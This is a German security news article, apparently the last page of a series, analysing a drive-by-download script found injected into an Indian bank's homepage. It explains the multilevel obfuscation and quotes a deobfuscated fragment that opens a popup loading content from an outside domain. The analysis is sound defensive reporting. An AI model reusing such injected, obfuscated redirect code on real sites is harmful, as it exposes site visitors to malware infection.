Malware via Online Banking

Der Drive-by-Download – schwer zu erkennen und brandgefährlich

Seite: 3/3

Firma zum Thema

Drive-by-Download am Beispiel einer Bank-Homepage

Erst kürzlich wurde auf der Website einer indischen Bank eine entsprechende Schadfunktion entdeckt. Auf eine namentliche Nennung des Kreditinstituts verzichtet Security-Insider.de, da die Webseite nach wie vor das Redirect-Skript enthält.

Auf den ersten Blick erscheint die Startseite der Bank unverändert. Wirft man jedoch einen Blick auf den Source Code (siehe Bilder), so ist zu erkennen, dass gegen Ende des Seitenquelltextes ein recht langes Javascript mit viel kryptischem Text angehängt wurde. Bei diesem Skript handelt es sich um ein sogenanntes „Multilevel Obfuscated Javascript“.

Bildergalerie

Nachfolgend ein Auszug aus dem Seitenquelltext:

Nach Ausführung der Funktion im Javacode ist folgende Funktion zu erkennen:

function show pop(){var pop_wnd = „http://dldslaunxxx.com/ld/ment/“;…

Das beschriebene Javascript umfasst zwei Teile, nämlich einen kryptischen Textblock und eine komplexere Funktion. Hierbei hat die Funktion keine andere Aufgabe, als aus dem kryptischen Teil normal ausführbaren Javacode zu erstellen. Dieser Code nennt sich daher „multilevel obfuscated“, da die Verschlüsselungsfunktion eine geschachtelte Verschleierungsmethode nutzt.

Bei dem vorliegenden Beispiel ruft der Javacode ein Popup-Fenster auf, das Inhalte einer anderen Webseite nachlädt. Dieser Javacode wird laut Virustotal von 24 aus 43 AV-Herstellern als schadhaft erkannt.

Die durch das Popup-Fenster nachgeladene Webseite führt aktuell nur zu einer geparkten URL ohne schadhaften Code. Es kann davon ausgegangen werden, dass diese Domain zu Beginn des Angriffs dennoch Schadcode enthielt.

Inhalt

  • Seite 1: Wie ein Drive-by-Download funktioniert
  • Seite 2: Abwehr und Erkennung von Drive-by-Downloads
  • Seite 3: Drive-by-Download am Beispiel einer Bank-Homepage

(ID:2050232)